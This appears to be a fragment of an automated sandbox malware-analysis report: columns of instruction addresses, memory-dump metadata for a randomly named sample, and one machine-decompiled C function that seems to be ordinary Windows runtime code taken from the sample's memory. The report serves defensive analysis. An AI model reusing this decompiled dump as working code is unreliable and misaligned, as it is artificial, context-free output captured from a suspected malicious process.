                                                              0x00a44239
                                                              0x00a44239
                                                              0x00a44233
                                                              0x00a44226
                                                              0x00a441ee
                                                              0x00a441ee
                                                              0x00a441f4
                                                              0x00a44575
                                                              0x00a8e1b1
                                                              0x00a8e1b1
                                                              0x00000000
                                                              0x00a4457b
                                                              0x00a4457b
                                                              0x00a44582
                                                              0x00a8e1ab
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a44588
                                                              0x00a44588
                                                              0x00a4458c
                                                              0x00a8e1c4
                                                              0x00a8e1c4
                                                              0x00000000
                                                              0x00a44592
                                                              0x00a44592
                                                              0x00a44599
                                                              0x00a8e1be
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a4459f
                                                              0x00a4459f
                                                              0x00a445a3
                                                              0x00a8e1d7
                                                              0x00a8e1e4
                                                              0x00000000
                                                              0x00a445a9
                                                              0x00a445a9
                                                              0x00a445b0
                                                              0x00a8e1d1
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a445b6
                                                              0x00a445b6
                                                              0x00a445b6
                                                              0x00000000
                                                              0x00a445b6
                                                              0x00a445b0
                                                              0x00a445a3
                                                              0x00a44599
                                                              0x00a4458c
                                                              0x00a44582
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a441f4
                                                              0x00a4423e
                                                              0x00a44241
                                                              0x00a445c0
                                                              0x00a445c4
                                                              0x00000000
                                                              0x00a445ca
                                                              0x00a445ca
                                                              0x00000000
                                                              0x00a8e207
                                                              0x00a8e20f
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a445d1
                                                              0x00000000
                                                              0x00000000
                                                              0x00a445ca
                                                              0x00000000
                                                              0x00a44247
                                                              0x00a44247
                                                              0x00a44247
                                                              0x00a44249
                                                              0x00a44249
                                                              0x00a44249
                                                              0x00a44251
                                                              0x00a44251
                                                              0x00a44257
                                                              0x00a4425f
                                                              0x00a4426e
                                                              0x00a44270
                                                              0x00a4427a
                                                              0x00a8e219
                                                              0x00a8e219
                                                              0x00a44280
                                                              0x00a44282
                                                              0x00a44456
                                                              0x00a445ea
                                                              0x00000000
                                                              0x00a445f0
                                                              0x00a8e223
                                                              0x00000000
                                                              0x00a8e223
                                                              0x00a4445c
                                                              0x00a4445c
                                                              0x00000000
                                                              0x00a4445c
                                                              0x00000000
                                                              0x00a44288
                                                              0x00a4428c
                                                              0x00a8e298
                                                              0x00a44292
                                                              0x00a44292
                                                              0x00a4429e
                                                              0x00a442a3
                                                              0x00a442a7
                                                              0x00a442ac
                                                              0x00a8e22d
                                                              0x00a442b2
                                                              0x00a442b2
                                                              0x00a442b9
                                                              0x00a442bc
                                                              0x00a442c2
                                                              0x00a442ca
                                                              0x00a442cd
                                                              0x00a442cd
                                                              0x00a442d4
                                                              0x00a4433f
                                                              0x00a4433f
                                                              0x00a442d6
                                                              0x00a442d6
                                                              0x00a442d9
                                                              0x00a442dd
                                                              0x00a442eb
                                                              0x00a8e23a
                                                              0x00a442f1
                                                              0x00a44305
                                                              0x00a4430d
                                                              0x00a44315
                                                              0x00a44318
                                                              0x00a4431f
                                                              0x00a44322
                                                              0x00a4432e
                                                              0x00a4433b
                                                              0x00a4433b
                                                              0x00000000
                                                              0x00a4432e
                                                              0x00a442eb
                                                              0x00a4434c
                                                              0x00a4434e
                                                              0x00a44352
                                                              0x00a44359
                                                              0x00a4435e
                                                              0x00a44361
                                                              0x00a4436e
                                                              0x00a4438a
                                                              0x00a4438e
                                                              0x00a44396
                                                              0x00a4439e
                                                              0x00a443a1
                                                              0x00a443ad
                                                              0x00a443bb
                                                              0x00a443bb
                                                              0x00a443ad
                                                              0x00a4436e
                                                              0x00a443bf
                                                              0x00a443c5
                                                              0x00a44463
                                                              0x00a44463
                                                              0x00a443ce
                                                              0x00a443d5
                                                              0x00a443d9
                                                              0x00a443df
                                                              0x00a44475
                                                              0x00a44479
                                                              0x00a44491
                                                              0x00a44491
                                                              0x00a44479
                                                              0x00a443e5
                                                              0x00a443eb
                                                              0x00a443f4
                                                              0x00a443f6
                                                              0x00a443f9
                                                              0x00a443fc
                                                              0x00a443ff
                                                              0x00a444e8
                                                              0x00a444ed
                                                              0x00a444f3
                                                              0x00a8e247
                                                              0x00000000
                                                              0x00a444f9
                                                              0x00a44504
                                                              0x00a44508
                                                              0x00a4450f
                                                              0x00a8e269
                                                              0x00000000
                                                              0x00a44515
                                                              0x00a44519
                                                              0x00a44531
                                                              0x00a44534
                                                              0x00a44537
                                                              0x00a4453e
                                                              0x00a44541
                                                              0x00a4454a
                                                              0x00a8e255
                                                              0x00a8e255
                                                              0x00a8e25b
                                                              0x00a8e25e
                                                              0x00a8e261
                                                              0x00a8e261
                                                              0x00a44555
                                                              0x00a44559
                                                              0x00a4455d
                                                              0x00a8e26d
                                                              0x00a8e270
                                                              0x00a8e274
                                                              0x00a8e27a
                                                              0x00a8e27d
                                                              0x00a8e28e
                                                              0x00a8e28e
                                                              0x00a44563
                                                              0x00a44563
                                                              0x00a44569
                                                              0x00a44569
                                                              0x00000000
                                                              0x00a4455d
                                                              0x00a4450f
                                                              0x00000000
                                                              0x00a444f3
                                                              0x00a443ff
                                                              0x00a44405
                                                              0x00a44405
                                                              0x00a44405
                                                              0x00a442ac
                                                              0x00a4428c
                                                              0x00a44282
                                                              0x00a44407
                                                              0x00a4440d
                                                              0x00a8e2af
                                                              0x00a8e2af
                                                              0x00a44413
                                                              0x00a44413
                                                              0x00000000
                                                              0x00a441d4
                                                              0x00000000
                                                              0x00a441c3
                                                              0x00a441bd
                                                              0x00a44415
                                                              0x00a44415
                                                              0x00a44416
                                                              0x00a44417
                                                              0x00a44429
                                                              0x00a4416e
                                                              0x00a4416e
                                                              0x00a44175
                                                              0x00a44498
                                                              0x00a4449f
                                                              0x00a8e12d
                                                              0x00000000
                                                              0x00a8e133
                                                              0x00000000
                                                              0x00a8e133
                                                              0x00a444a5
                                                              0x00a444a5
                                                              0x00a444aa
                                                              0x00000000
                                                              0x00a444bb
                                                              0x00a444ca
                                                              0x00a444d6
                                                              0x00a444d7
                                                              0x00a444d8
                                                              0x00a444e3
                                                              0x00a444e3
                                                              0x00a444aa
                                                              0x00a4417b
                                                              0x00a4417b
                                                              0x00a4417b
                                                              0x00000000
                                                              0x00a4417b
                                                              0x00a44175
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a572ea9e35ae34e6900b5bf19c993a3e0c65acf00e1e39ccf2123c1a403ee040
                                                              • Instruction ID: 3c6e47efb22a07c1abb88a59554672bbad424cdc81fc487f79faa5314a4350dd
                                                              • Opcode Fuzzy Hash: a572ea9e35ae34e6900b5bf19c993a3e0c65acf00e1e39ccf2123c1a403ee040
                                                              • Instruction Fuzzy Hash: 78F15878608251CBCB24DF29C480B7AB7F1BF98754F14892EF8868B290E734DC95DB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A520A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 92%
                                                              			E00A520A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0xb18714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E00A52EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E00A52EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E00A258EC(_t240);
									_t221 =  *0xb15cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0xb15cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E00A64A2C(0xb16e40, 0xa64b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E00A47D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0xa05c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E00A5F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E00A5F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E00AA7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L00A42400(_t267 + 0x20);
															}
															L00A42400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E00A52397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E00A42280(_t134, 0xb18608);
									__eflags =  *0xb16e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E00A3FFB0(_t198, _t241, 0xb18608);
										__eflags = _t253;
										if(_t253 != 0) {
											L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0xb16e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0xb18608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E00A56B90(_t210,  &_v64);
										_t262 =  *0xb18608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E00A5E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E00A697C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E00A6006A(0xb18608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0xb18608);
												E00A6B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0xb16904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0xb16e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E00A3FFB0(_t198, _t240, 0xb18608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E00A600C2(0xb18608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                              0x00a520a0
                                                              0x00a520a8
                                                              0x00a520ad
                                                              0x00a520b3
                                                              0x00a520b8
                                                              0x00a520c2
                                                              0x00a520c7
                                                              0x00a520cb
                                                              0x00a520d2
                                                              0x00a52263
                                                              0x00a52266
                                                              0x00a95836
                                                              0x00a95836
                                                              0x00000000
                                                              0x00a5226c
                                                              0x00a5226c
                                                              0x00a52270
                                                              0x00a52274
                                                              0x00a520e2
                                                              0x00a520e2
                                                              0x00a520e6
                                                              0x00a520ee
                                                              0x00a957dc
                                                              0x00a957de
                                                              0x00a957ec
                                                              0x00a957ec
                                                              0x00a957f1
                                                              0x00a957f3
                                                              0x00a957f8
                                                              0x00000000
                                                              0x00a957f8
                                                              0x00a957e0
                                                              0x00a957e4
                                                              0x00a957ea
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a957ea
                                                              0x00a520f4
                                                              0x00a520f4
                                                              0x00a520f8
                                                              0x00a520f8
                                                              0x00a520fc
                                                              0x00a52100
                                                              0x00a52106
                                                              0x00a52201
                                                              0x00a52206
                                                              0x00a5220b
                                                              0x00a5220e
                                                              0x00a522a9
                                                              0x00a522ac
                                                              0x00000000
                                                              0x00000000
                                                              0x00a522b2
                                                              0x00a522b5
                                                              0x00a95801
                                                              0x00a95806
                                                              0x00000000
                                                              0x00000000
                                                              0x00a95810
                                                              0x00a95815
                                                              0x00a95818
                                                              0x00000000
                                                              0x00000000
                                                              0x00a9581e
                                                              0x00a522bb
                                                              0x00a522bb
                                                              0x00a52218
                                                              0x00a52218
                                                              0x00a5221c
                                                              0x00a52220
                                                              0x00a52222
                                                              0x00a522c2
                                                              0x00a522c4
                                                              0x00a522dc
                                                              0x00a522dc
                                                              0x00a522e1
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a522e7
                                                              0x00a522c8
                                                              0x00a522cd
                                                              0x00a522d3
                                                              0x00a522d6
                                                              0x00a95823
                                                              0x00a95825
                                                              0x00a95827
                                                              0x00000000
                                                              0x00000000
                                                              0x00a9582d
                                                              0x00000000
                                                              0x00a9582d
                                                              0x00000000
                                                              0x00a52228
                                                              0x00a52228
                                                              0x00000000
                                                              0x00a52228
                                                              0x00a52222
                                                              0x00a52214
                                                              0x00a52214
                                                              0x00000000
                                                              0x00a52114
                                                              0x00a52114
                                                              0x00a52114
                                                              0x00a5211a
                                                              0x00a5211c
                                                              0x00a52348
                                                              0x00a5234d
                                                              0x00a95840
                                                              0x00a95845
                                                              0x00a95848
                                                              0x00a9584e
                                                              0x00a9584e
                                                              0x00a95848
                                                              0x00a52353
                                                              0x00a52355
                                                              0x00a52388
                                                              0x00a52388
                                                              0x00a52368
                                                              0x00a5236a
                                                              0x00a5236c
                                                              0x00a5238f
                                                              0x00000000
                                                              0x00a5236e
                                                              0x00a5236e
                                                              0x00a5218e
                                                              0x00a5218e
                                                              0x00a52191
                                                              0x00a52195
                                                              0x00a95a03
                                                              0x00a95a06
                                                              0x00a95a0c
                                                              0x00a95a0f
                                                              0x00a95a11
                                                              0x00a95a13
                                                              0x00a95a13
                                                              0x00a95a19
                                                              0x00a95a1f
                                                              0x00000000
                                                              0x00a5219b
                                                              0x00a5219b
                                                              0x00a521a0
                                                              0x00a52282
                                                              0x00a52284
                                                              0x00a52284
                                                              0x00a52284
                                                              0x00a52284
                                                              0x00a521a6
                                                              0x00a521a9
                                                              0x00a521ac
                                                              0x00a521ae
                                                              0x00a521b3
                                                              0x00a5228b
                                                              0x00a52290
                                                              0x00a52379
                                                              0x00a52296
                                                              0x00a52298
                                                              0x00a52298
                                                              0x00a52290
                                                              0x00a521b9
                                                              0x00a521be
                                                              0x00a522a2
                                                              0x00a522a2
                                                              0x00a521c4
                                                              0x00a521c8
                                                              0x00a521cc
                                                              0x00a521d0
                                                              0x00a521d4
                                                              0x00a521de
                                                              0x00a521e3
                                                              0x00a95a29
                                                              0x00a95a2c
                                                              0x00000000
                                                              0x00000000
                                                              0x00a95a3b
                                                              0x00000000
                                                              0x00a521e9
                                                              0x00a521e9
                                                              0x00a521e9
                                                              0x00a521ee
                                                              0x00a521f1
                                                              0x00a95a45
                                                              0x00a95a4b
                                                              0x00a95a52
                                                              0x00a95a58
                                                              0x00a95a5d
                                                              0x00a95a5f
                                                              0x00a95a71
                                                              0x00a95a61
                                                              0x00a95a6a
                                                              0x00a95a6a
                                                              0x00a95a76
                                                              0x00a95a79
                                                              0x00a95a7f
                                                              0x00a95a83
                                                              0x00a95a85
                                                              0x00a95a87
                                                              0x00a95a87
                                                              0x00a95a8c
                                                              0x00a95a91
                                                              0x00a95a97
                                                              0x00a95a9f
                                                              0x00a95aa0
                                                              0x00a95aa1
                                                              0x00a95aa6
                                                              0x00a95aab
                                                              0x00a95ab1
                                                              0x00a95ab3
                                                              0x00a95ab9
                                                              0x00a95aca
                                                              0x00a95ad4
                                                              0x00a95ad4
                                                              0x00a95ade
                                                              0x00a95ade
                                                              0x00a95aab
                                                              0x00a95a79
                                                              0x00a95a52
                                                              0x00a521f7
                                                              0x00a521f9
                                                              0x00a521fe
                                                              0x00a521fe
                                                              0x00a521e3
                                                              0x00a52195
                                                              0x00a5236c
                                                              0x00a52122
                                                              0x00a52122
                                                              0x00a52124
                                                              0x00a52231
                                                              0x00a52236
                                                              0x00a52236
                                                              0x00a52238
                                                              0x00a52238
                                                              0x00a52240
                                                              0x00a52242
                                                              0x00a52244
                                                              0x00a959fc
                                                              0x00a5218c
                                                              0x00a5218c
                                                              0x00000000
                                                              0x00a5218c
                                                              0x00a5224a
                                                              0x00a5224f
                                                              0x00a52256
                                                              0x00a52304
                                                              0x00a52309
                                                              0x00a5230f
                                                              0x00a5231e
                                                              0x00a5231e
                                                              0x00a5231e
                                                              0x00a52320
                                                              0x00a52325
                                                              0x00a5232a
                                                              0x00a5232c
                                                              0x00a5233e
                                                              0x00a5233e
                                                              0x00000000
                                                              0x00a5232c
                                                              0x00a52311
                                                              0x00a52317
                                                              0x00a5231a
                                                              0x00a5231c
                                                              0x00a52380
                                                              0x00a52380
                                                              0x00a52380
                                                              0x00a52384
                                                              0x00000000
                                                              0x00000000
                                                              0x00a52386
                                                              0x00000000
                                                              0x00a5231c
                                                              0x00a5225c
                                                              0x00a5225c
                                                              0x00000000
                                                              0x00a5225c
                                                              0x00a5212a
                                                              0x00a52134
                                                              0x00a52138
                                                              0x00a5213d
                                                              0x00a95858
                                                              0x00a95863
                                                              0x00a95863
                                                              0x00a95867
                                                              0x00a9586a
                                                              0x00000000
                                                              0x00000000
                                                              0x00a9586c
                                                              0x00a9586c
                                                              0x00a95871
                                                              0x00a95875
                                                              0x00a95877
                                                              0x00a95997
                                                              0x00a9599c
                                                              0x00a959a1
                                                              0x00a959a7
                                                              0x00a959a7
                                                              0x00000000
                                                              0x00a959a7
                                                              0x00a9587d
                                                              0x00000000
                                                              0x00a9588b
                                                              0x00a9588b
                                                              0x00a95890
                                                              0x00a95892
                                                              0x00a95894
                                                              0x00a95899
                                                              0x00a9589b
                                                              0x00a958a0
                                                              0x00a958a0
                                                              0x00a958aa
                                                              0x00a958b2
                                                              0x00a958b6
                                                              0x00a958be
                                                              0x00a958c6
                                                              0x00a958c9
                                                              0x00a9590d
                                                              0x00a95917
                                                              0x00a9591a
                                                              0x00a9591c
                                                              0x00a95920
                                                              0x00a95928
                                                              0x00a9592a
                                                              0x00a9592c
                                                              0x00a9592e
                                                              0x00a9592e
                                                              0x00a958cb
                                                              0x00a958cd
                                                              0x00a958d8
                                                              0x00a958e0
                                                              0x00a958f4
                                                              0x00a958fe
                                                              0x00a958fe
                                                              0x00a9593a
                                                              0x00a9593e
                                                              0x00a95940
                                                              0x00a95942
                                                              0x00000000
                                                              0x00a95944
                                                              0x00a95944
                                                              0x00a95949
                                                              0x00a9594e
                                                              0x00a9594e
                                                              0x00a95953
                                                              0x00a9595b
                                                              0x00a95976
                                                              0x00a95976
                                                              0x00a9597a
                                                              0x00a9597f
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a95981
                                                              0x00a95981
                                                              0x00a95981
                                                              0x00a95983
                                                              0x00a95988
                                                              0x00a9598d
                                                              0x00a95991
                                                              0x00a95991
                                                              0x00000000
                                                              0x00a9595d
                                                              0x00a9595d
                                                              0x00a95963
                                                              0x00a95965
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a95967
                                                              0x00a95967
                                                              0x00a9596b
                                                              0x00a9596d
                                                              0x00000000
                                                              0x00000000
                                                              0x00a9596f
                                                              0x00a95971
                                                              0x00a95971
                                                              0x00a95974
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a95974
                                                              0x00000000
                                                              0x00a95967
                                                              0x00a9595b
                                                              0x00a95942
                                                              0x00a95863
                                                              0x00a52143
                                                              0x00a52143
                                                              0x00a52149
                                                              0x00a5214f
                                                              0x00a522f1
                                                              0x00a522f6
                                                              0x00000000
                                                              0x00a52173
                                                              0x00a52173
                                                              0x00a5217d
                                                              0x00a52181
                                                              0x00a52186
                                                              0x00a959ae
                                                              0x00a959b2
                                                              0x00a959b5
                                                              0x00a959b7
                                                              0x00a959ba
                                                              0x00a959cd
                                                              0x00a959d1
                                                              0x00a959d5
                                                              0x00a959d9
                                                              0x00a959db
                                                              0x00000000
                                                              0x00000000
                                                              0x00a959dd
                                                              0x00a959dd
                                                              0x00a959e1
                                                              0x00a959e4
                                                              0x00a959e7
                                                              0x00a959ee
                                                              0x00a959ee
                                                              0x00a959f3
                                                              0x00a959f3
                                                              0x00000000
                                                              0x00a52186
                                                              0x00a5214f
                                                              0x00a52106
                                                              0x00a52266
                                                              0x00a520d8
                                                              0x00a520da
                                                              0x00a520e0
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
